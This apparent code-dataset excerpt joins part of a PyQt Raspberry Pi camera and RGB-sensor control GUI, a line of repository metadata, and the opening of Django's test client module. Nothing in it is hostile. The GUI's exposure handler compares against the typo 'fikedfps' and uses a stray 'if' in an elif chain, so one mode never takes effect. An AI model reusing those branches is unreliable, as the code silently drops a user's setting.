topLayout.addWidget(self.midTopGroupBox)
topLayout.addWidget(self.midBottomGroupBox)
bottomLayout = QHBoxLayout()
bottomLayout.addWidget(self.bottomLeftGroupBox)
bottomLayout.addWidget(self.bottomRightGroupBox)
mainLayout = QVBoxLayout()
mainLayout.addLayout(topLayout)
mainLayout.addLayout(bottomLayout)
mainLayout.addStretch(1)
self.setLayout(mainLayout)
self.show()
def createTopGroupBox(self):
self.topGroupBox = QGroupBox("Camera Capture Parameters")
delayLbl = QLabel('Delay:')
self.delayEntry = QLineEdit()
self.delayEntry.setText('5')
brightLbl = QLabel('Brightness:')
self.brightEntry = QLineEdit()
self.brightEntry.setText('50')
contrastLbl = QLabel('Contrast:')
self.contrastEntry = QLineEdit()
self.contrastEntry.setText('0')
shutterLbl = QLabel('Shutter Speed(μs)')
self.shutterEntry = QLineEdit()
self.shutterEntry.setText('0')
# Line 2
isoLbl = QLabel('ISO:')
self.isoEntry = QLineEdit()
self.isoEntry.setText('0')
prevTimeLbl = QLabel('Preview Timeout:')
self.prevTimeEntry = QLineEdit()
self.prevTimeEntry.setText('10')
resLbl = QLabel('Resolution:')
self.resEntry = QLineEdit()
self.resEntry.setText('2592x1944')
zoomLbl = QLabel('Zoom:')
self.zoomEntry = QLineEdit()
self.zoomEntry.setText('0.0, 0.0, 1.0, 1.0')
hbox1 = QHBoxLayout()
hbox1.addWidget(delayLbl)
hbox1.addWidget(self.delayEntry)
hbox1.addWidget(brightLbl)
hbox1.addWidget(self.brightEntry)
hbox1.addWidget(contrastLbl)
hbox1.addWidget(self.contrastEntry)
hbox1.addWidget(shutterLbl)
hbox1.addWidget(self.shutterEntry)
hbox2 = QHBoxLayout()
hbox2.addWidget(isoLbl)
hbox2.addWidget(self.isoEntry)
hbox2.addWidget(prevTimeLbl)
hbox2.addWidget(self.prevTimeEntry)
hbox2.addWidget(resLbl)
hbox2.addWidget(self.resEntry)
hbox2.addWidget(zoomLbl)
hbox2.addWidget(self.zoomEntry)
layout = QVBoxLayout()
layout.addLayout(hbox1)
layout.addLayout(hbox2)
layout.addStretch(1)
self.topGroupBox.setLayout(layout)
def createMidTopGroupBox(self):
self.midTopGroupBox = QGroupBox('Auto White Balance Modes')
self.autoAwb = QRadioButton()
self.autoAwb.setText('auto')
self.autoAwb.toggled.connect(lambda: self.abtnstate(self.autoAwb))
self.fluorAwb = QRadioButton()
self.fluorAwb.setText('fluorescent')
self.fluorAwb.toggled.connect(lambda: self.abtnstate(self.fluorAwb))
self.incanAwb = QRadioButton()
self.incanAwb.setText('incandescent')
self.incanAwb.toggled.connect(lambda: self.abtnstate(self.incanAwb))
self.offAwb = QRadioButton()
self.offAwb.setText('off')
self.offAwb.toggled.connect(lambda: self.abtnstate(self.offAwb))
self.defaultAwb = QRadioButton()
self.defaultAwb.setText('default')
self.defaultAwb.toggled.connect(lambda: self.abtnstate(self.defaultAwb))
self.sunAwb = QRadioButton()
self.sunAwb.setText('sun')
self.sunAwb.toggled.connect(lambda: self.abtnstate(self.sunAwb))
self.cloudAwb = QRadioButton()
self.cloudAwb.setText('cloud')
self.cloudAwb.toggled.connect(lambda: self.abtnstate(self.cloudAwb))
self.shadeAwb = QRadioButton()
self.shadeAwb.setText('shade')
self.shadeAwb.toggled.connect(lambda: self.abtnstate(self.shadeAwb))
self.tungsAwb = QRadioButton()
self.tungsAwb.setText('tungsten')
self.tungsAwb.toggled.connect(lambda: self.abtnstate(self.tungsAwb))
self.flashAwb = QRadioButton()
self.flashAwb.setText('flash')
self.flashAwb.toggled.connect(lambda: self.abtnstate(self.flashAwb))
self.horizonAwb = QRadioButton()
self.horizonAwb.setText('horizon')
self.horizonAwb.toggled.connect(lambda: self.abtnstate(self.horizonAwb))
self.defaultAwb.setChecked(True)
hbox1 = QHBoxLayout()
hbox1.addWidget(self.autoAwb)
hbox1.addWidget(self.fluorAwb)
hbox1.addWidget(self.incanAwb)
hbox1.addWidget(self.offAwb)
hbox1.addWidget(self.defaultAwb)
hbox2 = QHBoxLayout()
hbox2.addWidget(self.sunAwb)
hbox2.addWidget(self.cloudAwb)
hbox2.addWidget(self.shadeAwb)
hbox2.addWidget(self.tungsAwb)
hbox2.addWidget(self.flashAwb)
hbox2.addWidget(self.horizonAwb)
layout = QVBoxLayout()
layout.addLayout(hbox1)
layout.addLayout(hbox2)
layout.addStretch(1)
self.midTopGroupBox.setLayout(layout)
def createMidBottomGroupBox(self):
self.midBottomGroupBox = QGroupBox('Exposure Modes')
self.autoExp = QRadioButton()
self.autoExp.setText('auto')
self.autoExp.toggled.connect(lambda: self.btnstate(self.autoExp))
self.nightExp = QRadioButton()
self.nightExp.setText('night')
self.nightExp.toggled.connect(lambda: self.btnstate(self.nightExp))
self.offExp = QRadioButton()
self.offExp.setText('off')
self.offExp.toggled.connect(lambda: self.btnstate(self.offExp))
self.defaultExp = QRadioButton()
self.defaultExp.setText('default')
self.defaultExp.toggled.connect(lambda: self.btnstate(self.defaultExp))
self.sportsExp = QRadioButton()
self.sportsExp.setText('sports')
self.sportsExp.toggled.connect(lambda: self.btnstate(self.sportsExp))
self.longExp = QRadioButton()
self.longExp.setText('verylong')
self.longExp.toggled.connect(lambda: self.btnstate(self.longExp))
self.spotExp = QRadioButton()
self.spotExp.setText('spotlight')
self.spotExp.toggled.connect(lambda: self.btnstate(self.spotExp))
self.backExp = QRadioButton()
self.backExp.setText('backlight')
self.backExp.toggled.connect(lambda: self.btnstate(self.backExp))
self.fireExp = QRadioButton()
self.fireExp.setText('fireworks')
self.fireExp.toggled.connect(lambda: self.btnstate(self.fireExp))
self.antiExp = QRadioButton()
self.antiExp.setText('antishake')
self.antiExp.toggled.connect(lambda: self.btnstate(self.antiExp))
self.fixedExp = QRadioButton()
self.fixedExp.setText('fixedfps')
self.fixedExp.toggled.connect(lambda: self.btnstate(self.fixedExp))
self.beachExp = QRadioButton()
self.beachExp.setText('beach')
self.beachExp.toggled.connect(lambda: self.btnstate(self.beachExp))
self.snowExp = QRadioButton()
self.snowExp.setText('snow')
self.snowExp.toggled.connect(lambda: self.btnstate(self.snowExp))
self.nightpExp = QRadioButton()
self.nightpExp.setText('nightpreview')
self.nightpExp.toggled.connect(lambda: self.btnstate(self.nightpExp))
self.defaultExp.setChecked(True)
hbox1 = QHBoxLayout()
hbox1.addWidget(self.autoExp)
hbox1.addWidget(self.longExp)
hbox1.addWidget(self.nightExp)
hbox1.addWidget(self.defaultExp)
hbox1.addWidget(self.spotExp)
hbox1.addWidget(self.sportsExp)
hbox1.addWidget(self.offExp)
hbox2 = QHBoxLayout()
hbox2.addWidget(self.backExp)
hbox2.addWidget(self.fireExp)
hbox2.addWidget(self.antiExp)
hbox2.addWidget(self.fixedExp)
hbox2.addWidget(self.beachExp)
hbox2.addWidget(self.snowExp)
hbox2.addWidget(self.nightpExp)
layout = QVBoxLayout()
layout.addLayout(hbox1)
layout.addLayout(hbox2)
layout.addStretch(1)
self.midBottomGroupBox.setLayout(layout)
def abtnstate(self, state):
if state.text() == 'auto':
if state.isChecked():
self.awbvar = 'auto'
elif state.text() == 'fluorescent':
if state.isChecked():
self.awbvar = 'fluorescent'
elif state.text() == 'incandescent':
if state.isChecked():
self.awbvar = 'incandescent'
elif state.text() == 'off':
if state.isChecked():
self.awbvar = 'off'
elif state.text() == 'default':
if state.isChecked():
self.awbvar = ''
elif state.text() == 'sun':
if state.isChecked():
self.awbvar = 'sun'
elif state.text() == 'cloud':
if state.isChecked():
self.awbvar = 'cloud'
elif state.text() == 'shade':
if state.isChecked():
self.awbvar = 'shade'
elif state.text() == 'tungsten':
if state.isChecked():
self.awbvar = 'tungsten'
elif state.text() == 'flash':
if state.isChecked():
self.awbvar = 'flash'
elif state.text() == 'horizon':
if state.isChecked():
self.awbvar = 'horizon'
def btnstate(self, state):
if state.text() == 'auto':
if state.isChecked():
self.expvar = 'auto'
elif state.text() == 'night':
if state.isChecked():
self.expvar = 'night'
elif state.text() == 'verylong':
if state.isChecked():
self.expvar = 'verylong'
elif state.text() == 'off':
if state.isChecked():
self.expvar = 'off'
elif state.text() == 'default':
if state.isChecked():
self.expvar = ''
elif state.text() == 'sports':
if state.isChecked():
self.expvar = 'sports'
elif state.text() == 'spotlight':
if state.isChecked():
self.expvar = 'spotlight'
elif state.text() == 'backlight':
if state.isChecked():
self.expvar = 'backlight'
elif state.text() == 'fireworks':
if state.isChecked():
self.expvar = 'fireworks'
elif state.text() == 'antishake':
if state.isChecked():
self.expvar = 'antishake'
elif state.text() == 'fikedfps':
if state.isChecked():
self.expvar = 'fixedfps'
if state.text() == 'beach':
if state.isChecked():
self.expvar = 'beach'
elif state.text() == 'snow':
if state.isChecked():
self.expvar = 'snow'
elif state.text() == 'nightpreview':
if state.isChecked():
self.expvar = 'nightpreview'
def createBottomLeftGroupBox(self):
self.bottomLeftGroupBox = QGroupBox('Camera Options')
captureBtn = QPushButton('Take Picture')
captureBtn.clicked.connect(self.takePictureThread)
setNormOptionsBtn = QPushButton('Set Normal Options')
setNormOptionsBtn.clicked.connect(self.normalSettings)
setDarkOptionsBtn = QPushButton('Set Low Light Options')
setDarkOptionsBtn.clicked.connect(self.darkSettings)
previewBtn = QPushButton('Camera Preview')
previewBtn.clicked.connect(self.cameraPreviewThread)
showPlotsBtn = QPushButton('Show Plots')
showPlotsBtn.clicked.connect(self.showPlots)
showImageBtn = QPushButton('Show Image')
showImageBtn.clicked.connect(lambda: self.showImage(showImageBtn.text()))
importImageBtn = QPushButton('Import Image')
importImageBtn.clicked.connect(self.importImageThread)
saveImageBtn = QPushButton('Save Image')
saveImageBtn.clicked.connect(self.saveImage)
showRedImageBtn = QPushButton('Show Red')
showRedImageBtn.clicked.connect(lambda: self.showImage(showRedImageBtn.text()))
showBlueImageBtn = QPushButton('Show Blue')
showBlueImageBtn.clicked.connect(lambda: self.showImage(showBlueImageBtn.text()))
showGreenImageBtn = QPushButton('Show Green')
showGreenImageBtn.clicked.connect(lambda: self.showImage(showGreenImageBtn.text()))
saveAllBtn = QPushButton('Save All')
saveAllBtn.clicked.connect(self.saveAllThread)
vbox1 = QVBoxLayout()
vbox1.addWidget(captureBtn)
vbox1.addWidget(setNormOptionsBtn)
vbox1.addWidget(setDarkOptionsBtn)
vbox1.addWidget(previewBtn)
vbox2 = QVBoxLayout()
vbox2.addWidget(showImageBtn)
vbox2.addWidget(showPlotsBtn)
vbox2.addWidget(importImageBtn)
vbox2.addWidget(saveImageBtn)
vbox3 = QVBoxLayout()
vbox3.addWidget(showRedImageBtn)
vbox3.addWidget(showGreenImageBtn)
vbox3.addWidget(showBlueImageBtn)
vbox3.addWidget(saveAllBtn)
layout = QHBoxLayout()
layout.addLayout(vbox1)
layout.addLayout(vbox2)
layout.addLayout(vbox3)
layout.addStretch(1)
self.bottomLeftGroupBox.setLayout(layout)
def takePictureThread(self):
self.statusbar = 'Taking Picture...'
captureThread = threading.Thread(target=self.takePicture)
captureThread.start()
def importImageThread(self):
self.statusbar = 'Importing Image...'
self.image = QFileDialog.getOpenFileName(self, 'Choose Image', os.sep.join((os.path.expanduser('~'), 'Desktop')),
'Image Files (*.png *.jpg *.jpeg)')
importThread = threading.Thread(target=self.importImage)
importThread.start()
def cameraPreviewThread(self):
self.statusbar = 'Loading Preview...'
previewThread = threading.Thread(target=self.cameraPreview)
previewThread.start()
def saveAllThread(self):
self.statusbar = 'Saving Files..'
self.directory = QFileDialog.getExistingDirectory(self, 'Choose Directory', os.path.expanduser('~'))
saveThread = threading.Thread(target=self.saveAll)
saveThread.start()
def takePicture(self):
iso = int(float(self.isoEntry.text()))
resolution_string = self.resEntry.text().split('x')
resolution = (int(float(resolution_string[0])), int(float(resolution_string[1])))
delay = int(float(self.delayEntry.text()))
brightness = int(float(self.brightEntry.text()))
contrast = int(float(self.contrastEntry.text()))
shutterspeed = int(float(self.shutterEntry.text()))
zoom = tuple(map(float, self.zoomEntry.text().split(',')))
exposuremode = self.expvar
awbmode = self.awbvar
self.rgb_array = RPiCamera.takePicture(iso=iso, timeout=delay, resolution=resolution, exposure=exposuremode,
brightness=brightness, contrast=contrast, shutterspeed=shutterspeed,
zoom=zoom, awb_mode=awbmode)
red_intensity, green_intensity, blue_intensity, intensity = RPiCamera.returnIntensity(self.rgb_array)
intensity_array = '\n'.join(['R:' + '{:.3f}'.format(red_intensity),
'G:' + '{:.3f}'.format(green_intensity),
'B:' + '{:.3f}'.format(blue_intensity),
'I:' + '{:.3f}'.format(intensity)])
self.intensityLbl.setText(intensity_array)
self.intensityLbl.adjustSize()
self.statusbar = 'Ready'
def normalSettings(self):
self.delayEntry.setText('5')
self.prevTimeEntry.setText('10')
self.shutterEntry.setText('0')
def darkSettings(self):
self.delayEntry.setText('50')
self.prevTimeEntry.setText('50')
self.shutterEntry.setText('6000000')
def cameraPreview(self):
iso = int(float(self.isoEntry.text()))
resolution_string = self.resEntry.text().split('x')
resolution = (int(float(resolution_string[0])), int(float(resolution_string[1])))
delay = int(float(self.prevTimeEntry.text()))
brightness = int(float(self.brightEntry.text()))
contrast = int(float(self.contrastEntry.text()))
shutterspeed = int(float(self.shutterEntry.text()))
zoom = tuple(map(float, self.zoomEntry.text().split(',')))
exposuremode = self.expvar
awbmode = self.awbvar
RPiCamera.startPreview(iso=iso, timeout=delay, resolution=resolution, exposure=exposuremode,
brightness=brightness, contrast=contrast, shutterspeed=shutterspeed,
zoom=zoom, awb_mode=awbmode)
self.statusbar = 'Ready'
def showPlots(self):
try:
RPiCamera.showPlot(self.rgb_array)
self.statusbar = 'Ready'
except ValueError:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('Array not loaded, make sure you take picture or import an image first.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
def showImage(self, text):
try:
if text == 'Show Red':
RPiCamera.showImage(self.rgb_array, 'r')
elif text == 'Show Green':
RPiCamera.showImage(self.rgb_array, 'g')
elif text == 'Show Blue':
RPiCamera.showImage(self.rgb_array, 'b')
else:
RPiCamera.showImage(self.rgb_array)
except ValueError:
mb = QMessageBox()
mb.setIcon(QMessageBox.Information)
mb.setWindowTitle('Error')
mb.setText('Array not loaded, make sure you take picture or import an image first.')
mb.setStandardButtons(QMessageBox.Ok)
mb.show()
def saveImage(self):
filename = QFileDialog.getSaveFileName(self, 'Save Image As', os.sep.join((os.path.expanduser('~'), 'Desktop')), 'Image Files (*.png *.jpg *.jpeg)')
RPiCamera.saveImage(self.rgb_array, filename[0])
def saveAll(self):
foldername = 'ISO={}-Delay={}-Resolution={}-Brightness={}-Contrast={}-ShutterSpeed={}' \
'-Exposure={}-AutoWhiteBalance={}-' \
'Zoom={}'.format(self.isoEntry.text(), self.delayEntry.text(), self.resEntry.text(),
self.brightEntry.text(), self.contrastEntry.text(),
self.shutterEntry.text(), self.expvar, self.awbvar, self.zoomEntry.text())
RPiCamera.saveAllImages(self.rgb_array, self.directory, foldername)
self.statusbar = 'Ready'
def importImage(self):
self.rgb_array = RPiCamera.importImage(self.image[0])
red_intensity, green_intensity, blue_intensity, intensity = RPiCamera.returnIntensity(self.rgb_array)
intensity_array = '\n'.join(['R:' + '{:.3f}'.format(red_intensity),
'G:' + '{:.3f}'.format(green_intensity),
'B:' + '{:.3f}'.format(blue_intensity),
'I:' + '{:.3f}'.format(intensity)])
self.intensityLbl.setText(intensity_array)
self.intensityLbl.adjustSize()
self.statusbar = 'Ready'
def createBottomRightGroupBox(self):
self.bottomRightGroupBox = QGroupBox('Image Intensity Data')
self.intensityLbl = QLabel('Not Taken')
layout = QHBoxLayout()
layout.addWidget(self.intensityLbl)
layout.addStretch(1)
self.bottomRightGroupBox.setLayout(layout)
class CameraMainWindow(QMainWindow):
def __init__(self):
super(CameraMainWindow, self).__init__()
self.initUI()
def initUI(self):
# QToolTip.setFont(QFont('SansSerif', 9))
self.cwidget = CameraCenterWidget()
self.setCentralWidget(self.cwidget)
# self.setToolTip('This is a <b>QWidget</b> widget')
self.center()
self.setWindowTitle('Camera Control GUI')
self.statusBarTimer = QTimer(self)
self.statusBarTimer.timeout.connect(self.statusUpdate)
self.statusBarTimer.start(100)
# self.p = QPalette(self.palette())
# self.p.setColor(QPalette.Window, QColor(53, 53, 53))
# self.p.setColor(QPalette.WindowText, Qt.white)
# self.p.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
# self.p.setColor(QPalette.ToolTipBase, Qt.white)
# self.p.setColor(QPalette.ToolTipText, Qt.white)
# self.p.setColor(QPalette.Button, QColor(53, 53, 53))
# self.p.setColor(QPalette.ButtonText, Qt.white)
# self.p.setColor(QPalette.BrightText, Qt.red)
# self.p.setColor(QPalette.Highlight, QColor(142, 45, 197).lighter())
# self.p.setColor(QPalette.HighlightedText, Qt.black)
# self.setPalette(self.p)
self.show()
def statusUpdate(self):
self.statusBar().showMessage(self.cwidget.statusbar)
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message', 'Are you sure you want to quit?',
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
# def quitApp(self):
# QCoreApplication.instance().quit()
class RGBCenterWidget(QWidget):
def __init__(self):
super(RGBCenterWidget, self).__init__()
self.initUI()
# self.start_time = time.time()
def initUI(self):
self.tf = 'PlotTextFile.txt'
self.statusbar = 'Ready'
self.createTopGroupBox()
self.createMidGroupBox()
self.createBottomLeftGroupBox()
self.createBottomRightGroupBox()
topLayout = QVBoxLayout()
topLayout.addWidget(self.topGroupBox)
topLayout.addWidget(self.midGroupBox)
bottomLayout = QHBoxLayout()
bottomLayout.addWidget(self.bottomLeftGroupBox)
bottomLayout.addWidget(self.bottomRightGroupBox)
mainLayout = QVBoxLayout()
mainLayout.addLayout(topLayout)
mainLayout.addLayout(bottomLayout)
mainLayout.addStretch(1)
self.setLayout(mainLayout)
self.show()
def createTopGroupBox(self):
self.topGroupBox = QGroupBox('Integration Time')
self.it2_4ms = QRadioButton()
self.it2_4ms.setText('2.4ms')
self.it2_4ms.toggled.connect(lambda: self.itstate(self.it2_4ms))
self.it24ms = QRadioButton()
self.it24ms.setText('24ms')
self.it24ms.toggled.connect(lambda: self.itstate(self.it24ms))
self.it50ms = QRadioButton()
self.it50ms.setText('50ms')
self.it50ms.toggled.connect(lambda: self.itstate(self.it50ms))
self.it101ms = QRadioButton()
self.it101ms.setText('101ms')
self.it101ms.toggled.connect(lambda: self.itstate(self.it101ms))
self.it154ms = QRadioButton()
self.it154ms.setText('154ms')
self.it154ms.toggled.connect(lambda: self.itstate(self.it154ms))
self.it700ms = QRadioButton()
self.it700ms.setText('700ms')
self.it700ms.toggled.connect(lambda: self.itstate(self.it700ms))
self.it2_4ms.setChecked(True)
layout = QHBoxLayout()
layout.addWidget(self.it2_4ms)
layout.addWidget(self.it24ms)
layout.addWidget(self.it50ms)
layout.addWidget(self.it101ms)
layout.addWidget(self.it154ms)
layout.addWidget(self.it700ms)
layout.addStretch(1)
self.topGroupBox.setLayout(layout)
def createMidGroupBox(self):
self.midGroupBox = QGroupBox('Gain')
self.gain1 = QRadioButton()
self.gain1.setText('1X')
self.gain1.toggled.connect(lambda: self.gnstate(self.gain1))
self.gain4 = QRadioButton()
self.gain4.setText('4X')
self.gain4.toggled.connect(lambda: self.gnstate(self.gain4))
self.gain16 = QRadioButton()
self.gain16.setText('16X')
self.gain16.toggled.connect(lambda: self.gnstate(self.gain16))
self.gain60 = QRadioButton()
self.gain60.setText('60X')
self.gain60.toggled.connect(lambda: self.gnstate(self.gain60))
self.gain1.setChecked(True)
layout = QHBoxLayout()
layout.addWidget(self.gain1)
layout.addWidget(self.gain4)
layout.addWidget(self.gain16)
layout.addWidget(self.gain60)
layout.addStretch(1)
self.midGroupBox.setLayout(layout)
def itstate(self, state):
if state.text() == '2.4ms':
if state.isChecked():
self.itvar = '2.4'
elif state.text() == '24ms':
if state.isChecked():
self.itvar = '24'
elif state.text() == '50ms':
if state.isChecked():
self.itvar = '50'
elif state.text() == '101ms':
if state.isChecked():
self.itvar = '101'
elif state.text() == '154ms':
if state.isChecked():
self.itvar = '154'
elif state.text() == '700ms':
if state.isChecked():
self.itvar = '700'
def gnstate(self, state):
if state.text() == '1X':
if state.isChecked():
self.gainvar = '1'
elif state.text() == '4X':
if state.isChecked():
self.gainvar = '4'
elif state.text() == '16X':
if state.isChecked():
self.gainvar = '16'
elif state.text() == '60X':
if state.isChecked():
self.gainvar = '60'
def createBottomLeftGroupBox(self):
self.bottomLeftGroupBox = QGroupBox('Sensor Options')
captureBtn = QPushButton('Capture Data')
captureBtn.clicked.connect(self.captureDataThread)
setNormOptionsBtn = QPushButton('Set Normal Options')
setNormOptionsBtn.clicked.connect(self.normalSettings)
setDarkOptionsBtn = QPushButton('Set Low Light Options')
setDarkOptionsBtn.clicked.connect(self.darkSettings)
saveBtn = QPushButton('Save Data')
saveBtn.clicked.connect(self.saveData)
layout = QVBoxLayout()
layout.addWidget(captureBtn)
layout.addWidget(setNormOptionsBtn)
layout.addWidget(setDarkOptionsBtn)
layout.addWidget(saveBtn)
layout.addStretch(1)
self.bottomLeftGroupBox.setLayout(layout)
def captureDataThread(self):
self.statusbar = 'Capturing Data...'
captureThread = threading.Thread(target=self.captureData)
captureThread.start()
def captureData(self):
self.red_intensity, self.green_intensity, self.blue_intensity, self.clear_unfiltered, self.lux,\
self.color_temperature = RGBSensor.Capture(integrationtime=float(self.itvar), gain=int(self.gainvar))
intensity_array = '\n'.join(['R:' + '{}'.format(self.red_intensity),
'G:' + '{}'.format(self.green_intensity),
'B:' + '{}'.format(self.blue_intensity),
'Clear:' + '{}'.format(self.clear_unfiltered),
'Luminosity:{} lux'.format(self.lux),
'Color Temperature:{} K'.format(self.color_temperature)])
self.intensityLbl.setText(intensity_array)
self.intensityLbl.adjustSize()
self.statusbar = 'Ready'
def normalSettings(self):
self.gain1.setChecked(True)
self.it2_4ms.setChecked(True)
def darkSettings(self):
self.gain60.setChecked(True)
self.it700ms.setChecked(True)
def saveData(self):
RGBSensor.saveData(self.red_intensity, self.green_intensity, self.blue_intensity, self.clear_unfiltered,
self.lux, self.color_temperature)
self.statusbar = 'Ready'
def createBottomRightGroupBox(self):
self.bottomRightGroupBox = QGroupBox('Sensor Data')
self.intensityLbl = QLabel('Not Taken')
layout = QHBoxLayout()
layout.addWidget(self.intensityLbl)
layout.addStretch(1)
self.bottomRightGroupBox.setLayout(layout)
class RGBMainWindow(QMainWindow):
def __init__(self):
super(RGBMainWindow, self).__init__()
self.initUI()
def initUI(self):
# QToolTip.setFont(QFont('SansSerif', 9))
self.cwidget = RGBCenterWidget()
self.setCentralWidget(self.cwidget)
# self.setToolTip('This is a <b>QWidget</b> widget')
self.center()
self.setWindowTitle('RGB Sensor GUI')
self.statusBarTimer = QTimer(self)
self.statusBarTimer.timeout.connect(self.statusUpdate)
self.statusBarTimer.start(100)
# self.p = QPalette(self.palette())
# self.p.setColor(QPalette.Window, QColor(53, 53, 53))
# self.p.setColor(QPalette.WindowText, Qt.white)
# self.p.setColor(QPalette.AlternateBase, QColor(53, 53, 53))
# self.p.setColor(QPalette.ToolTipBase, Qt.white)
# self.p.setColor(QPalette.ToolTipText, Qt.white)
# self.p.setColor(QPalette.Button, QColor(53, 53, 53))
# self.p.setColor(QPalette.ButtonText, Qt.white)
# self.p.setColor(QPalette.BrightText, Qt.red)
# self.p.setColor(QPalette.Highlight, QColor(142, 45, 197).lighter())
# self.p.setColor(QPalette.HighlightedText, Qt.black)
# self.setPalette(self.p)
self.show()
def statusUpdate(self):
self.statusBar().showMessage(self.cwidget.statusbar)
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def closeEvent(self, event):
reply = QMessageBox.question(self, 'Message', 'Are you sure you want to quit?',
QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
else:
event.ignore()
# def quitApp(self):
# QCoreApplication.instance().quit()
def startGUI():
app = QApplication(sys.argv)
mw = GUIMainWindow()
# cw = GUICenterWidget()
rc = app.exec_()
del app
sys.exit(rc)
def startCameraGUI():
app = QApplication(sys.argv)
mw = CameraMainWindow()
# cw = CameraCenterWidget()
rc = app.exec_()
del app
sys.exit(rc)
def startRGBSensorGUI():
app = QApplication(sys.argv)
mw = RGBMainWindow()
# cw = RGBCenterWidget()
rc = app.exec_()
del app
sys.exit(rc)
|
gpl-3.0
| 4,477,484,512,611,405,000
| 34.548441
| 156
| 0.614324
| false
| 3.81519
| false
| false
| false
|
andersonresende/django
|
django/test/client.py
|
2
|
24532
|
from __future__ import unicode_literals
import sys
import os
import re
import mimetypes
from copy import copy
from importlib import import_module
from io import BytesIO
from django.apps import apps
from django.conf import settings
from django.core import urlresolvers
from django.core.handlers.base import BaseHandler
from django.core.handlers.wsgi import WSGIRequest, ISO_8859_1, UTF_8
from django.core.signals import (request_started, request_finished,
got_request_exception)
from django.db import close_old_connections
from django.http import SimpleCookie, HttpRequest, QueryDict
from django.template import TemplateDoesNotExist
from django.test import signals
from django.utils.functional import curry, SimpleLazyObject
from django.utils.encoding import force_bytes, force_str, uri_to_iri
from django.utils.http import urlencode
from django.utils.itercompat import is_iterable
from django.utils import six
from django.utils.six.moves.urllib.parse import urlparse, urlsplit
from django.test.utils import ContextList
__all__ = ('Client', 'RequestFactory', 'encode_file', 'encode_multipart')
BOUNDARY = 'BoUnDaRyStRiNg'
MULTIPART_CONTENT = 'multipart/form-data; boundary=%s' % BOUNDARY
CONTENT_TYPE_RE = re.compile('.*; charset=([\w\d-]+);?')
class FakePayload(object):
"""
A wrapper around BytesIO that restricts what can be read since data from
the network can't be seeked and cannot be read outside of its content
length. This makes sure that views can't do anything under the test client
that wouldn't work in Real Life.
"""
def __init__(self, content=None):
self.__content = BytesIO()
self.__len = 0
self.read_started = False
if content is not None:
self.write(content)
def __len__(self):
return self.__len
def read(self, num_bytes=None):
if not self.read_started:
self.__content.seek(0)
self.read_started = True
if num_bytes is None:
num_bytes = self.__len or 0
assert self.__len >= num_bytes, "Cannot read more than the available bytes from the HTTP incoming data."
content = self.__content.read(num_bytes)
self.__len -= num_bytes
return content
def write(self, content):
if self.read_started:
raise ValueError("Unable to write a payload after he's been read")
content = force_bytes(content)
self.__content.write(content)
self.__len += len(content)
def closing_iterator_wrapper(iterable, close):
try:
for item in iterable:
yield item
finally:
request_finished.disconnect(close_old_connections)
close() # will fire request_finished
request_finished.connect(close_old_connections)
class ClientHandler(BaseHandler):
"""
A HTTP Handler that can be used for testing purposes. Uses the WSGI
interface to compose requests, but returns the raw HttpResponse object with
the originating WSGIRequest attached to its ``wsgi_request`` attribute.
"""
def __init__(self, enforce_csrf_checks=True, *args, **kwargs):
self.enforce_csrf_checks = enforce_csrf_checks
super(ClientHandler, self).__init__(*args, **kwargs)
def __call__(self, environ):
# Set up middleware if needed. We couldn't do this earlier, because
# settings weren't available.
if self._request_middleware is None:
self.load_middleware()
request_started.disconnect(close_old_connections)
request_started.send(sender=self.__class__, environ=environ)
request_started.connect(close_old_connections)
request = WSGIRequest(environ)
# sneaky little hack so that we can easily get round
# CsrfViewMiddleware. This makes life easier, and is probably
# required for backwards compatibility with external tests against
# admin views.
request._dont_enforce_csrf_checks = not self.enforce_csrf_checks
# Request goes through middleware.
response = self.get_response(request)
# Attach the originating request to the response so that it could be
# later retrieved.
response.wsgi_request = request
# We're emulating a WSGI server; we must call the close method
# on completion.
if response.streaming:
response.streaming_content = closing_iterator_wrapper(
response.streaming_content, response.close)
else:
request_finished.disconnect(close_old_connections)
response.close() # will fire request_finished
request_finished.connect(close_old_connections)
return response
def store_rendered_templates(store, signal, sender, template, context, **kwargs):
"""
Stores templates and contexts that are rendered.
The context is copied so that it is an accurate representation at the time
of rendering.
"""
store.setdefault('templates', []).append(template)
store.setdefault('context', ContextList()).append(copy(context))
def encode_multipart(boundary, data):
"""
Encodes multipart POST data from a dictionary of form values.
The key will be used as the form data name; the value will be transmitted
as content. If the value is a file, the contents of the file will be sent
as an application/octet-stream; otherwise, str(value) will be sent.
"""
lines = []
to_bytes = lambda s: force_bytes(s, settings.DEFAULT_CHARSET)
# Not by any means perfect, but good enough for our purposes.
is_file = lambda thing: hasattr(thing, "read") and callable(thing.read)
# Each bit of the multipart form data could be either a form value or a
# file, or a *list* of form values and/or files. Remember that HTTP field
# names can be duplicated!
for (key, value) in data.items():
if is_file(value):
lines.extend(encode_file(boundary, key, value))
elif not isinstance(value, six.string_types) and is_iterable(value):
for item in value:
if is_file(item):
lines.extend(encode_file(boundary, key, item))
else:
lines.extend([to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
item
]])
else:
lines.extend([to_bytes(val) for val in [
'--%s' % boundary,
'Content-Disposition: form-data; name="%s"' % key,
'',
value
]])
lines.extend([
to_bytes('--%s--' % boundary),
b'',
])
return b'\r\n'.join(lines)
def encode_file(boundary, key, file):
to_bytes = lambda s: force_bytes(s, settings.DEFAULT_CHARSET)
if hasattr(file, 'content_type'):
content_type = file.content_type
else:
content_type = mimetypes.guess_type(file.name)[0]
if content_type is None:
content_type = 'application/octet-stream'
return [
to_bytes('--%s' % boundary),
to_bytes('Content-Disposition: form-data; name="%s"; filename="%s"'
% (key, os.path.basename(file.name))),
to_bytes('Content-Type: %s' % content_type),
b'',
file.read()
]
class RequestFactory(object):
"""
Class that lets you create mock Request objects for use in testing.
Usage:
rf = RequestFactory()
get_request = rf.get('/hello/')
post_request = rf.post('/submit/', {'foo': 'bar'})
